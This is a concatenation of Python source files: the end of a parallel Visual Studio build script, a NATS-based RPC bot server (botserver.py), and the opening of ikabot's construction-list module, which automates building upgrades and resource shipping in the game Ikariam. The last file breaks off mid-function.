if iReturnCode == 1:
iTryCount += 1;
else:
break;
oOutputLock.acquire();
if iReturnCode != 0:
print "Build %s (%s, %s) failed! Error code: %d" % (sFileName, sPlatform, sConfig, iReturnCode);
giErrorCount += 1;
else:
print "Build %s (%s, %s) success!" % (sFileName, sPlatform, sConfig);
oOutputLock.release();
if __name__ == "__main__":
import sys;
oOutputLock = threading.Lock();
aoThreads = [];
sFolderPath = os.path.dirname(__file__);
for sFileName in os.listdir(sFolderPath):
if sFileName[-4:].lower() == ".sln" and os.path.isfile(sFileName):
for sConfig in ["Debug", "Release"]:
for sPlatform in ["Win32", "x64"]:
oThread = threading.Thread(target = build, args = (sFolderPath, sFileName, sPlatform, sConfig));
oThread.start();
aoThreads.append(oThread);
for oThread in aoThreads:
oThread.join();
if giErrorCount > 0:
raw_input("Press ENTER to exit...");
|
botserver.py
|
# coding: utf-8
from __future__ import absolute_import, with_statement, print_function, unicode_literals
__version__ = '21.021.1735' # _fg_time
#__version__ = '21.020.1950' # default _system_list_methods (.__class__.__name__[-3:] == 'Api')
#__version__ = '20.324.1230' # http post body ungzip
#__version__ = '20.310.1900' # location
#__version__ = '20.281.2058' # _http, _func
#__version__ = '20.272.2127' # gzip_decode
#__version__ = '20.260.0040' # binary
#__version__ = '20.219.1837'
#__version__ = '20.211.1402'
#__version__ = '20.196.1406'
#__version__ = '20.104.0843'
#__version__ = '20.053.0012'
#__version__ = '20.022.0414'
#__version__ = '19.347.1606'
import sys
PY2 = sys.version_info[0] < 3
PY3 = sys.version_info[0] > 2
if __name__ == '__main__':
# env PYTHONIOENCODING="UTF-8"
if PY2:
reload(sys); sys.setdefaultencoding('UTF-8')
else:
if sys.stdout.encoding != 'UTF-8':
sys.stdout = open(sys.stdout.fileno(), mode='w', buffering=1, encoding='UTF-8')
#if sys.stderr.encoding != 'UTF-8':
# sys.stderr = open(sys.stderr.fileno(), mode='w', buffering=1, encoding='UTF-8')
sys.stderr.close()
sys.stderr = sys.stdout
import socket
try:
__hostname__ = sys.__hostname__
except:
__hostname__ = socket.gethostname().lower()
sys.__hostname__ = __hostname__
if PY2:
import ConfigParser as configparser
input = raw_input
from urllib import quote_plus, unquote_plus, urlencode
from urlparse import urlparse
BrokenPipeError = socket.error
ConnectionRefusedError = socket.error
from xmlrpclib import gzip_decode, gzip_encode
else:
import configparser
raw_input = input
from urllib.parse import quote_plus, unquote_plus, urlencode, urlparse
from xmlrpc.client import gzip_decode, gzip_encode
import os, time, json #, pickle
from threading import Thread, RLock
import pydoc
import threading, types, traceback
import uuid, hashlib, base64
import random
import decimal, datetime
class ExtJSONEncoder(json.JSONEncoder):
def default(self, obj):
#if isinstance(obj, Binary):
# return {'__binary__': obj.encode()}
if isinstance(obj, decimal.Decimal):
return float(obj)
elif isinstance(obj, datetime.datetime):
return str(obj)
elif isinstance(obj, datetime.date):
return str(obj)
elif isinstance(obj, set):
return list(obj)
return json.JSONEncoder.default(self, obj)
try:
from types import SimpleNamespace
except ImportError:
class SimpleNamespace (object):
def __init__ (self, **kwargs):
self.__dict__.update(kwargs)
def __repr__ (self):
keys = sorted(self.__dict__)
items = ("{}={!r}".format(k, self.__dict__[k]) for k in keys)
return "{}({})".format(type(self).__name__, ", ".join(items))
def __eq__ (self, other):
return self.__dict__ == other.__dict__
if PY2:
Binary = lambda data: {'__binary__': base64.b64encode(data)}
else:
Binary = lambda data: {'__binary__': base64.b64encode(data).decode('ascii')}
Location = lambda href: {'__location__': href}
#_binary = lambda obj: SimpleNamespace(data=base64.b64decode(obj.pop('__binary__'))) if '__binary__' in obj else obj
def _binary(obj):
if '__binary__' in obj:
return SimpleNamespace(data=base64.b64decode(obj.pop('__binary__')))
elif '__location__' in obj:
return SimpleNamespace(href=obj.pop('__location__'))
else:
return obj
try:
_ns
except:
_ns = SimpleNamespace(request_number=0, request_count=0)
class BOTServer(object):
def __init__(self, name, address=None, authkey=None, max_requests=0):
self._max_requests = max_requests
self._info = {}
self._sock = None
self._w_lck = RLock()
self._fg_serve_forever = False
self._functions = {}
self._botname = name
self.bot_id = 'bot.%s' % urn5(name)
if address is None:
address = ('127.0.0.1', 4222)
self._address = address
self._authkey = authkey
self.register_function(self._system_list_methods, 'system.listMethods')
self.register_function(self._system_method_help, 'system.methodHelp')
self.register_function(self._http, '.http')
@property
def request_number(self):
return _ns.request_number
@property
def request_count(self):
return _ns.request_count
def __repr__(self):
return (
"<%s for %s %s>" % (self.__class__.__name__, self._botname, self._address)
)
__str__ = __repr__
def _system_list_methods(self, func_name=None):
#print(1111, func_name)
if func_name:
func = None
if func_name in self._functions:
func = self._functions[func_name]
else:
for fn in func_name.split('.'):
func = getattr(func, fn) if func else self._functions[fn]
#print(2222, func)
if func:
_list_methods = None
if hasattr(func, '_system_list_methods'):
_list_methods = getattr(func, '_system_list_methods')
#print(3333, [k for k in dir(func) if '_' != k[:1]])
if _list_methods:
return _list_methods(self, func_name)
else:
#return list(sorted('%s.' % k if isinstance(getattr(func, k), sys.__class__) or hasattr(getattr(func, k), '_system_list_methods') or getattr(func, k).__class__.__name__[-3:] == 'Api') else k for k in dir(func) if '_' != k[:1]))
_r = []
for k in dir(func):
if '_' == k[0]:
continue
m = getattr(func, k)
k = '%s.' % k if isinstance(m, sys.__class__) or hasattr(m, '_system_list_methods') or m.__class__.__name__[-3:] == 'Api' else k
_r.append(k)
_r.sort()
return _r
else:
return RuntimeError('%s not found' % func_name)
else:
return list(sorted('%s.' % k if isinstance(v, sys.__class__) or hasattr(v, '_system_list_methods') or (v.__class__.__name__[-3:] == 'Api') else k for k, v in self._functions.items()))
def _system_method_help(self, func_name):
func = None
if func_name in self._functions:
func = self._functions[func_name]
else:
for fn in func_name.split('.'):
func = getattr(func, fn) if func else self._functions[fn]
if func:
return pydoc.getdoc(func)
else:
return ''
def _http(self, head, body):
global __appname__,__profile__, __version__, __index__
status = '200 OK'
r = b''
uri, args = head[''][1]
method = uri.rsplit('/', 1)[-1]
if '/' == uri:
try:
appname = getattr(sys, '__appname__')
except AttributeError:
appname = self._botname.split('.', 1)[0]
#appname = __appname__
try:
profile = getattr(sys, '__profile__')
except AttributeError:
profile = self._botname.split('.', 1)[-1]
#profile = __profile__
try:
version = getattr(sys, '__version__')
except AttributeError:
version = __version__
try:
_index = getattr(sys, '__index__')
except AttributeError:
_index = __index__
headers = [("Content-Type", "text/plain; charset=utf-8"), ("Cache-Control", "no-cache"), ("Access-Control-Allow-Origin", "*")]
r = ('%s %s %s.%s %s %s:%s/%s' % (time.strftime(_ts), sys.__hostname__, appname,profile, version, _index,self.request_number,self.request_count)).encode('utf-8')
headers.append(('Content-Length', str(len(r))))
return status, headers, r
if uri == '/ui':
uri = 'ui/'
return '303 OK', [('Location', uri),], b''
if uri[:4] == '/ui/' and uri[:8] != '/ui/RPC2':
return '404 Not Found', [], b'404 Not Found'
headers = [('Content-Type', 'application/json; charset=utf-8'), ("Cache-Control", "no-cache"), ("Access-Control-Allow-Origin", "*")]
try:
if 'post' == head[''][0]:
if b'\x1f\x8b\x08\x00' == body[:4]:
if PY2:
body = gzip_decode(body)
else:
body = gzip_decode(body, -1)
body = json.loads(body)
method, _a, _kw = body['method'], body.get('params', []), body.get('kwargs', {})
else:
_a, _kw = [], {}
if args:
#for a in args.split('&'):
# a = a.split('=', 1)
for a in (a.split('=', 1) for arg in args.split('&') for a in arg.split(',')):
if len(a) > 1:
_kw[a[0]] = a[1]
else:
_a.append(a[0])
r = self._func(method, _a, _kw)
r = json.dumps({'result': r}, ensure_ascii=False, cls=ExtJSONEncoder).encode('utf8')
except Exception as e:
log(None)
r = json.dumps({'error': str(e)}, ensure_ascii=False, cls=ExtJSONEncoder).encode('utf8')
#r = json.dumps({'error': traceback.format_exc()}, ensure_ascii=False, cls=ExtJSONEncoder).encode('utf8')
finally:
if len(r) > 1400:
r = gzip_encode(r)
headers.append(('Content-Encoding', 'gzip'))
headers.append(('Content-Length', str(len(r))))
return status, headers, r
def _func(self, func_name, args, kwargs):
_func_name = func_name
func = None
if func_name in self._functions:
func = self._functions[func_name]
else:
for fn in func_name.split('.'):
try:
func = getattr(func, fn) if func else self._functions[fn]
except:
func = None
break
if func:
if callable(func):
r = func(*args, **kwargs)
else:
r = func
return r
raise RuntimeError('%s not found' % _func_name)
def register_function(self, func, name=None):
if name:
self._functions[name] = func
else:
self._functions[func.__name__] = func
def register_instance(self, instance, allow_dotted_names=False):
for name in dir(instance):
if '_' == name[:1]:
continue
func = getattr(instance, name)
if allow_dotted_names:
self._functions[name] = func
else:
if callable(func):
self._functions[name] = func
def close(self):
self._fg_serve_forever = False
self._unsub()
self._close()
def _close(self):
try:
if self._sock:
with self._w_lck:
self._sock.close()
except:
#log(None)
pass
def _unsub(self):
try:
if self._sock:
with self._w_lck:
self._sock.sendall(b'UNSUB 2\r\nUNSUB 3\r\n')
except:
#log(None)
pass
def serve_forever(self):
self.close()
#try:
# self._serve_forever()
#finally:
# self.close()
_defer = []
defer = _defer.append
_err_old = ''
_fg_loop = True
while _fg_loop:
_fg_loop = False
_fg_time = False
try:
self._serve_forever(defer)
except (ConnectionRefusedError, RuntimeError) as e:
#traceback.print_exc()
_fg_loop = True # self._fg_serve_forever
_fg_time = True
_err = str(e)
if _err_old != _err:
_err_old = _err
log(_err, kind='error1')
except Exception as e:
_fg_loop = self._fg_serve_forever
#traceback.print_exc()
_err = str(e)
if _err_old != _err:
_err_old = _err
log(_err, kind='error2')
#log(None)
finally:
while _defer:
func = _defer.pop(-1)
try:
func()
except:
#log(None)
pass
#print(2222)
if _fg_loop and _fg_time:
try:
time.sleep(1 + random.random())
except:
_fg_loop = False
pass
#log('stop', begin='\r')
def notify(self, subject, data=None):
if not self._fg_serve_forever:
return
if data is None:
data = ('PUB %s 0\r\n\r\n' % subject).encode('utf8')
else:
data = json.dumps(data, ensure_ascii=False, cls=ExtJSONEncoder).encode('utf8')
#data = pickle.dumps(data, protocol=2)
if len(data) > 1400:
data = gzip_encode(data)
data = ('PUB %s %s\r\n' % (subject, len(data))).encode('utf8') + data + b'\r\n'
#print('data:', data)
with self._w_lck:
try:
self._sock.sendall(data)
return True
except:
traceback.print_exc()
def _send(self, inbox_id, obj, fg_http=False):
if fg_http:
data = b''.join([b'HTTP', json.dumps(obj[:2], ensure_ascii=False, separators=(',', ':')).encode('utf8'), b'\r\n', obj[2]])
else:
data = json.dumps(obj, ensure_ascii=False, cls=ExtJSONEncoder).encode('utf8')
if len(data) > 1400:
data = gzip_encode(data)
data = b'PUB %s %s\r\n%s\r\n' % (inbox_id.encode(), ('%s' % len(data)).encode(), data)
with self._w_lck:
#log(repr(data), 'send2')
self._sock.sendall(data)
return len(data)
def _serve_forever(self, defer):
#while True:
# client_c = self.accept()
# t = Thread(target=self.handle_client, args=(client_c,))
# t.daemon = True
# t.start()
#print('00000', self._sock)
sock = socket.create_connection(self._address, 2)
self._sock = sock
defer(sock.close)
defer(lambda: sock.sendall(b'UNSUB 2\r\nUNSUB 3\r\n'))
def w(data):
with self._w_lck:
#log(repr(data), 'send1')
sock.sendall(data)
bot_name = self._botname
bot_id = self.bot_id # 'bot.%s' % urn5(bot_name)
"""
w(('CONNECT {"name":"%s","verbose":false,"pedantic":false}\r\n' % bot_name).encode('utf8'))
data = 'SUB bot.info 2\r\n'
#log(data, 'NATS')
w(data.encode('utf8'))
#data = 'SUB %s 3\r\n' % (bot_id,)
data = 'SUB %s %s 3\r\n' % (bot_id, bot_id)
#log(data, 'NATS')
w(data.encode('utf8'))
"""
w(('CONNECT {"name":"%s","verbose":false,"pedantic":false}\r\n' % bot_name).encode('utf8') + ('SUB bot.info 2\r\nSUB %s %s 3\r\n' % (bot_id, bot_id)).encode('utf8'))
self._fg_serve_forever = True
c = 0
while self._fg_serve_forever:
cmd = ''
data = ''
try:
data = recvline(sock)
cmd, data = data[:3], data[3:]
except socket.timeout:
c += 1
#log('%s) timeout' % c, 'socket0')
if c > 3:
c = 0
#log('pong) timeout', 'socket0')
w(b'PONG\r\n')
continue
finally:
if self._max_requests < 0 and _ns.request_count < 1:
self.close()
raise ValueError('MAX REQUESTS %s' % _ns.request_number) # KeyboardInterrupt
#os._exit(0)
if not cmd:
raise RuntimeError('[ Socket ] cmd is empty')
if not data:
raise RuntimeError('[ Socket ] data is empty')
#log('>%s<' % data, '<%s>' % cmd)
if 'MSG' == cmd:
#MSG <subject> <sid> [reply-to] <#bytes>\r\n[payload]\r\n
data = data.split()
#print('data:', data)
if 3 == len(data):
subj, sid, reply_id, size = data[0], data[1], '', int(data[2])
else:
subj, sid, reply_id, size = data[0], data[1], data[2], int(data[3])
payload = recvall(sock, size) if size > 0 else b''
sock.recv(1)
sock.recv(1)
#log(cmd, 'nats')
#print(cmd, subj, sid, reply_id, repr(payload)[:32], '...', len(payload), size)
if sid == '2' and reply_id and not payload:
log(subj, 'sid 2 subj:')
#sys.stdout.flush()
#MSG bot.info 2 cli.a1f9d72027a9455496efc3947fc4ea8c b''
#w(('PUB %s %s %s\r\n%s\r\n' % (reply_id, bot_id, len(bot_name), bot_name)).encode('utf8'))
elif sid == '3' and reply_id:
data = ('PUB %s 0\r\n\r\n' % reply_id).encode('utf8') # ask
#print('data:', data)
w(data)
"""
with self._w_lck:
try:
self._sock.sendall(data)
except:
traceback.print_exc()
"""
_ns.request_number += 1
_t = Thread(target=self.handle_client, args=(reply_id, payload))
_t.daemon = True
_t.name += '-msg'
_t.start()
#sys.stdout.flush()
elif 'PIN' == cmd:
w(b'PONG\r\n')
elif 'PON' == cmd:
pass
elif 'INF' == cmd:
self._info = json.loads(data[2:])
#self._info = json.loads(data[5:])
#cid = self._info['client_id']
#w(('SUB bot.info 2\r\nSUB %s %s 3\r\n' % (bot_id, bot_id)).encode('utf8'))
elif cmd in ('+OK', '-ER'):
pass
def handle_client(self, reply_id, payload):
try:
_ns.request_count += 1
return self._handle_client(reply_id, payload)
finally:
_ns.request_count -= 1
if self._max_requests > 0:
with self._w_lck:
if self._max_requests > 0 and _ns.request_number >= self._max_requests:
self._unsub()
self._max_requests = -1
def _handle_client(self, reply_id, payload):
#threading.current_thread().conn = client_c
_fg = True
while _fg:
fg_http = False
_fg = False
try:
if b'HTTP' == payload[:4]:
head, payload = payload.split(b'\r\n', 1)
head = json.loads(head[4:])
#if b'\x1f\x8b\x08\x00' == payload[:4]:
# payload = gzip_decode(payload, -1)
#print(head)
#print(payload)
func_name = '.http'
args = (head, payload)
kwargs = {}
fg_http = True
else:
if b'\x1f\x8b\x08\x00' == payload[:4]:
if PY2:
payload = gzip_decode(payload)
else:
payload = gzip_decode(payload, -1)
payload = json.loads(payload, object_hook=_binary)
func_name = payload.get('method', '')
args = payload.pop('args', [])
kwargs = payload.pop('kwargs', {})
#except EOFError:
# #print('close:', client_c)
# #sys.stdout.flush()
# break
except Exception as e:
print('recv:', type(e), str(e))
traceback.print_exc()
sys.stdout.flush()
break
#print(111)
try:
func = None
if func_name in self._functions:
func = self._functions[func_name]
else:
for fn in func_name.split('.'):
func = getattr(func, fn) if func else self._functions[fn]
#print(222, func)
if func:
if callable(func):
r = func(*args, **kwargs)
"""
if isinstance(r, types.GeneratorType):
self._send(reply_id, {'result': list}) # types.ListType)
#client_c.send('types.GeneratorType')
for v in r:
self._send(reply_id, {'result': v})
self._send(reply_id, {'result': StopIteration})
continue
"""
else:
r = func
if fg_http:
_len = self._send(reply_id, r, fg_http=True)
else:
_len = self._send(reply_id, {'result': r})
else:
r = RuntimeError('%s not found' % func_name)
_len = self._send(reply_id, {'error': str(r)})
#print('send >>', _len)
except Exception as e:
try:
self._send(reply_id, {'error': str(e)})
except IOError:
break
except Exception as e:
print('send:', type(e), str(e))
sys.stdout.flush()
break
def recvline(s):
data = []
while True:
ch2 = s.recv(2)
if ch2:
data.append(ch2)
if ch2[-1:] == b'\r':
data.append(s.recv(1))
break
elif ch2[-1:] == b'\n':
break
else:
break
return b''.join(data).decode()
def recvall(r, n):
data = []
c = 0
while c < n:
packet = r.recv(n - c)
if not packet:
break
c += len(packet)
data.append(packet)
return b''.join(data)
"""
def readall(r, n):
data = []
c = 0
while c < n:
#log(c, n)
packet = r.read(n - c)
if not packet:
return b''
c += len(packet)
data.append(packet)
return b''.join(data)
"""
def urn1(name):
h1 = hashlib.sha1(uuid.NAMESPACE_DNS.bytes)
h1.update(name.encode())
return base64.b32encode(h1.digest()).decode('utf8')
#return 'urn:sha1:%s' % base64.b32encode(h1.digest()).decode('utf8')
def urn5(name):
h5 = hashlib.md5(uuid.NAMESPACE_DNS.bytes)
h5.update(name.encode())
return base64.b16encode(h5.digest()).decode('utf8').lower()
#return 'urn:md5:%s' % base64.b16encode(h5.digest()).decode('utf8').lower()
class BOTApi(object):
def _system_list_methods(self, func_name=None):
return list(sorted(k for k in dir(self) if '_' != k[:1]))
def add2(self, x, y):
""" help add2 """
return x + y
def sub2(self, x, y):
return x - y
#def ping(self, name, port):
# client_c = threading.current_thread().conn
# s = socket.fromfd(client_c.fileno(), socket.AF_INET, socket.SOCK_STREAM)
# #print(s, dir(s), s.getpeername()[0], s.getsockname(), s.gettimeout())
# client_ip = s.getpeername()[0]
# s.close()
# return client_ip, port
_ts = "%Y-%m-%d %H:%M:%S"
__appname__ = 'botserver'
__profile__ = 'test'
__index__ = os.getpid()
def log(msg, kind='info', begin='', end='\n'):
global _ts, __hostname__, __appname__, __profile__, __version__, __index__
try:
try: ts = time.strftime(_ts)
except: ts = time.strftime(_ts)
if msg is None:
data = ''.join(
('%s %s %s.%s %s %s:%s %s\n' % (ts, __hostname__, __appname__,__profile__,__version__,__index__,'traceback', msg)
if i else '%s %s %s.%s %s %s:%s\n' % (ts, __hostname__, __appname__,__profile__,__version__,__index__,msg)
) for i, msg in enumerate(traceback.format_exc().splitlines())
)
else:
data = '%s%s %s %s.%s %s %s:%s %s%s' % (begin,ts, __hostname__, __appname__,__profile__,__version__,__index__,kind, msg,end)
sys.stdout.write(data)
sys.stdout.flush()
except:
pass
#traceback.print_exc()
try:
if sys.log:
log = sys.log
except:
pass
################################
def run_api(name, object_function=None, func_name=None):
# Create and run the server
#serv = BOTServer(name)
#serv = BOTServer(name, ('nats0.tgbot.ms', 4222))
serv = BOTServer(name, ('127.0.0.1', 4222))
#serv = BOTServer(name, ('nats1.tgbot.ms', 4222))
# api = BOTApi()
# serv.register_function(api, 'api')
print(serv)
if object_function:
serv.register_function(object_function, func_name)
#o = dict(k1='v1', k2='v2', k3='v3')
#serv.register_instance(o)
#from pprint import pprint
#pprint(serv._functions)
serv.register_function(sys)
serv.register_function(time)
serv.register_function(time.sleep)
_th = Thread(target=serv.serve_forever)
_th.daemon = True
_th.start()
try:
#serv.serve_forever()
while True:
s = input('>> ').strip()
if not s:
print(serv.notify('SUBJ.' + serv.bot_id, {1:2, 'k2': 'v4'}))
else:
raise KeyboardInterrupt
except (KeyboardInterrupt, SystemExit) as e:
print('stoped server')
sys.stdout.flush()
if __name__ == '__main__':
try:
s = sys.argv[1]
except:
s = ''
run_api('mybot.conf')
#run_api('price-bot.test' + s)
|
constructionList.py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import time
import json
import math
import random
import gettext
import traceback
import threading
from decimal import *
from ikabot.config import *
from ikabot.helpers.gui import *
from ikabot.helpers.varios import *
from ikabot.helpers.botComm import *
from ikabot.helpers.pedirInfo import *
from ikabot.web.session import normal_get
from ikabot.helpers.planRoutes import *
from ikabot.helpers.getJson import getCity
from ikabot.helpers.signals import setInfoSignal
from ikabot.helpers.process import set_child_mode
from ikabot.helpers.resources import getAvailableResources
t = gettext.translation('constructionList', localedir, languages=languages, fallback=True)
_ = t.gettext
sendResources = True
expand = True
thread = None
def waitForConstruction(session, city_id):
"""
Parameters
----------
session : ikabot.web.session.Session
city_id : int
Returns
-------
city : dict
"""
while True:
html = session.get(city_url + city_id)
city = getCity(html)
construction_buildings = [building for building in city['position'] if 'completed' in building]
if len(construction_buildings) == 0:
break
construction_building = construction_buildings[0]
construction_time = construction_building['completed']
current_time = int(time.time())
final_time = int(construction_time)
seconds_to_wait = final_time - current_time
msg = _('{}: I wait {:d} seconds so that {} gets to the level {:d}').format(city['cityName'], seconds_to_wait, construction_building['name'], construction_building['level'] + 1)
sendToBotDebug(session, msg, debugON_constructionList)
wait(seconds_to_wait + 10)
html = session.get(city_url + city_id)
city = getCity(html)
return city
def expandBuilding(session, cityId, building, waitForResources):
"""
Parameters
----------
session : ikabot.web.session.Session
cityId : int
building : dict
waitForResources : bool
"""
current_level = building['level']
if building['isBusy']:
current_level += 1
levels_to_upgrade = building['upgradeTo'] - current_level
position = building['position']
time.sleep(random.randint(5, 15)) # to avoid race conditions with sendResourcesNeeded
for lv in range(levels_to_upgrade):
city = waitForConstruction(session, cityId)
building = city['position'][position]
if building['canUpgrade'] is False and waitForResources is True:
while building['canUpgrade'] is False:
time.sleep(60)
seconds = getMinimumWaitingTime(session)
html = session.get(city_url + cityId)
city = getCity(html)
building = city['position'][position]
# if no ships are comming, exit no matter if the building can or can't upgrade
if seconds == 0:
break
wait(seconds + 5)
if building['canUpgrade'] is False:
msg = _('City:{}\n').format(city['cityName'])
msg += _('Building:{}\n').format(building['name'])
msg += _('The building could not be completed due to lack of resources.\n')
msg += _('Missed {:d} levels').format(levels_to_upgrade - lv)
sendToBot(session, msg)
return
url = 'action=CityScreen&function=upgradeBuilding&actionRequest={}&cityId={}&position={:d}&level={}&activeTab=tabSendTransporter&backgroundView=city¤tCityId={}&templateView={}&ajax=1'.format(actionRequest, cityId, position, building['level'], cityId, building['building'])
resp = session.post(url)
html = session.get(city_url + cityId)
city = getCity(html)
building = city['position'][position]
if building['isBusy'] is False:
msg = _('{}: The building {} was not extended').format(city['cityName'], building['name'])
sendToBot(session, msg)
sendToBot(session, resp)
return
msg = _('{}: The building {} is being extended to level {:d}.').format(city['cityName'], building['name'], building['level']+1)
sendToBotDebug(session, msg, debugON_constructionList)
msg = _('{}: The building {} finished extending to level: {:d}.').format(city['cityName'], building['name'], building['level']+1)
sendToBotDebug(session, msg, debugON_constructionList)
def getCostsReducers(city):
"""
Parameters
----------
city : dict
Returns
-------
reducers_per_material_level : dict[int, int]
"""
reducers_per_material = [0] * len(materials_names)
assert len(reducers_per_material) == 5
for building in city['position']:
if building['name'] == 'empty':
continue
lv = building['level']
if building['building'] == 'carpentering':
reducers_per_material[0] = lv
elif building['building'] == 'vineyard':
reducers_per_material[1] = lv
elif building['building'] == 'architect':
reducers_per_material[2] = lv
elif building['building'] == 'optician':
reducers_per_material[3] = lv
elif building['building'] == 'fireworker':
reducers_per_material[4] = lv
return reducers_per_material
def getResourcesNeeded(session, city, building, current_level, final_level):
"""
Parameters
----------
session : ikabot.web.session.Session
city : dict
building : dict
current_level : int
final_level : int
Returns
-------
costs_per_material : dict[int, int]
"""
# get html with information about buildings
building_detail_url = 'view=buildingDetail&buildingId=0&helpId=1&backgroundView=city¤tCityId={}&templateView=ikipedia&actionRequest={}&ajax=1'.format(city['id'], actionRequest)
building_detail_response = session.post(building_detail_url)
building_detail = json.loads(building_detail_response, strict=False)
building_html = building_detail[1][1][1]
# get html with information about buildings costs
regex_building_detail = r'<div class="(?:selected)? button_building ' + re.escape(building['building']) + r'"\s*onmouseover="\$\(this\)\.addClass\(\'hover\'\);" onmouseout="\$\(this\)\.removeClass\(\'hover\'\);"\s*onclick="ajaxHandlerCall\(\'\?(.*?)\'\);'
match = re.search(regex_building_detail, building_html)
building_costs_url = match.group(1)
building_costs_url += 'backgroundView=city¤tCityId={}&templateView=buildingDetail&actionRequest={}&ajax=1'.format(city['id'], actionRequest)
building_costs_response = session.post(building_costs_url)
building_costs = json.loads(building_costs_response, strict=False)
html_costs = building_costs[1][1][1]
# if the user has all the resource saving studies, we save that in the session data (one less request)
sessionData = session.getSessionData()
if 'reduccion_inv_max' in sessionData:
costs_reduction = 14
else:
# get the studies
url = 'view=noViewChange&researchType=economy&backgroundView=city¤tCityId={}&templateView=researchAdvisor&actionRequest={}&ajax=1'.format(city['id'], actionRequest)
rta = session.post(url)
rta = json.loads(rta, strict=False)
studies = rta[2][1]['new_js_params']
studies = json.loads(studies, strict=False)
studies = studies['currResearchType']
# look for resource saving studies
costs_reduction = 0
for study in studies:
if studies[study]['liClass'] != 'explored':
continue
link = studies[study]['aHref']
if '2020' in link:
costs_reduction += 2
elif '2060' in link:
costs_reduction += 4
elif '2100' in link:
costs_reduction += 8
# if the user has all the resource saving studies, save that in the session data
if costs_reduction == 14:
sessionData['reduccion_inv_max'] = True
session.setSessionData(sessionData)
# calculate cost reductions
costs_reduction /= 100
costs_reduction = 1 - costs_reduction
# get buildings that reduce the cost of upgrades
costs_reductions = getCostsReducers(city)
# get the type of resources that this upgrade will cost (wood, marble, etc)
resources_types = re.findall(r'<th class="costs"><img src="skin/resources/icon_(.*?)\.png"/></th>', html_costs)[:-1]
# get the actual cost of each upgrade
matches = re.findall(r'<td class="level">\d+</td>(?:\s+<td class="costs">.*?</td>)+', html_costs)
# calculate the cost of the entire upgrade, taking into account all the possible reductions
final_costs = [0] * len(materials_names)
levels_to_upgrade = 0
for match in matches:
lv = re.search(r'"level">(\d+)</td>', match).group(1)
lv = int(lv)
if lv <= current_level:
continue
if lv > final_level:
break
levels_to_upgrade += 1
# get the costs for the current level
costs = re.findall(r'<td class="costs">([\d,\.]*)</td>', match)
for i in range(len(costs)):
resource_type = resources_types[i]
for j in range(len(materials_names_tec)):
name = materials_names_tec[j]
if resource_type == name:
resource_index = j
break
# get the cost of the current resource type
cost = costs[i]
cost = cost.replace(',', '').replace('.', '')
cost = 0 if cost == '' else int(cost)
# calculate all the reductions
real_cost = Decimal(cost)
# investigation reduction
original_cost = Decimal(real_cost) / Decimal(costs_reduction)
# special building reduction
real_cost -= Decimal(original_cost) * (Decimal(costs_reductions[resource_index]) / Decimal(100))
final_costs[resource_index] += math.ceil(real_cost)
if levels_to_upgrade < final_level - current_level:
print(_('This building only allows you to expand {:d} more levels').format(levels_to_upgrade))
msg = _('Expand {:d} levels? [Y/n]:').format(levels_to_upgrade)
rta = read(msg=msg, values=['Y', 'y', 'N', 'n', ''])
if rta.lower() == 'n':
return [-1, -1, -1, -1, -1]
return final_costs
def sendResourcesNeeded(session, destination_city_id, city_origins, missing_resources):
"""
Parameters
----------
session : ikabot.web.session.Session
destination_city_id : int
city_origins : dict
missing_resources : dict[int, int]
"""
info = _('\nTransport resources to upload building\n')
try:
routes = []
html = session.get(city_url + destination_city_id)
cityD = getCity(html)
for i in range(len(materials_names)):
missing = missing_resources[i]
if missing <= 0:
continue
# send the resources from each origin city
for cityOrigin in city_origins[i]:
if missing == 0:
break
available = cityOrigin['recursos'][i]
send = min(available, missing)
missing -= send
toSend = [0] * len(materials_names)
toSend[i] = send
route = (cityOrigin, cityD, cityD['islandId'], *toSend)
routes.append(route)
executeRoutes(session, routes)
except Exception as e:
msg = _('Error in:\n{}\nCause:\n{}').format(info, traceback.format_exc())
sendToBot(session, msg)
# no s.logout() because this is a thread, not a process
def chooseResourceProviders(session, cities_ids, cities, city_id, resource, missing):
"""
Parameters
----------
session : ikabot.web.session.Session
cities_ids : list[int]
cities : dict[int, dict]
city_id : int
resource : int
missing : int
"""
global sendResources
sendResources = True
global expand
expand = True
banner()
print(_('From what cities obtain {}?').format(materials_names[resource].lower()))
tradegood_initials = [material_name[0] for material_name in materials_names]
maxName = max([len(cities[city]['name']) for city in cities if cities[city]['id'] != city_id])
origin_cities = []
total_available = 0
for cityId in cities_ids:
if cityId == city_id:
continue
html = session.get(city_url + cityId)
city = getCity(html)
available = city['recursos'][resource]
if available == 0:
continue
# ask the user it this city should provide resources
tradegood_initial = tradegood_initials[int(cities[cityId]['tradegood'])]
pad = ' ' * (maxName - len(cities[cityId]['name']))
msg = '{}{} ({}): {} [Y/n]:'.format(pad, cities[cityId]['name'], tradegood_initial, addThousandSeparator(available))
choice = read(msg=msg, values=['Y', 'y', 'N', 'n', ''])
if choice.lower() == 'n':
continue
# if so, save the city and calculate the total amount resources to send
total_available += available
origin_cities.append(city)
# if we have enough resources, return
if total_available >= missing:
return origin_cities
# if we reach this part, there are not enough resources to expand the building
print(_('\nThere are not enough resources.'))
if len(origin_cities) > 0:
print(_('\nSend the resources anyway? [Y/n]'))
choice = read(values=['y', 'Y', 'n', 'N', ''])
if choice.lower() == 'n':
sendResources = False
print(_('\nTry to expand the building anyway? [y/N]'))
choice = read(values=['y', 'Y', 'n', 'N', ''])
if choice.lower() == 'n' or choice == '':
expand = False
return origin_cities
def sendResourcesMenu(session, city_id, missing):
"""
Parameters
----------
session : ikabot.web.session.Session
city_id : int
missing : list[int, int]
"""
global thread
cities_ids, cities = getIdsOfCities(session)
origins = {}
# for each missing resource, choose providers
for resource in range(len(missing)):
if missing[resource] <= 0:
continue
origin_cities = chooseResourceProviders(session, cities_ids, cities, city_id, resource, missing[resource])
if sendResources is False and expand:
print(_('\nThe building will be expanded if possible.'))
enter()
return
elif sendResources is False:
return
origins[resource] = origin_cities
if expand:
print(_('\nThe resources will be sent and the building will be expanded if possible.'))
else:
print(_('\nThe resources will be sent.'))
enter()
# create a new thread to send the resources
thread = threading.Thread(target=sendResourcesNeeded, args=(session, city_id, origins, missing,))
thread.start()
def getBuildingToExpand(session, cityId):
"""
Parameters
----------
session : ikabot.web.session.Session
cityId : int
Returns
-------
building : dict
"""
html = session.get(city_url + cityId)
city = getCity(html)
banner()
# show the buildings available to expand (ignore empty spaces)
print(_('Which building do you want to expand?\n'))
print(_('(0)\t\texit'))
buildings = [building for building in city['position'] if building['name'] != 'empty']
for i in range(len(buildings)):
building = buildings[i]
level = building['level']
if level < 10:
level = ' ' + str(level)
else:
level = str(level)
if building['isBusy']:
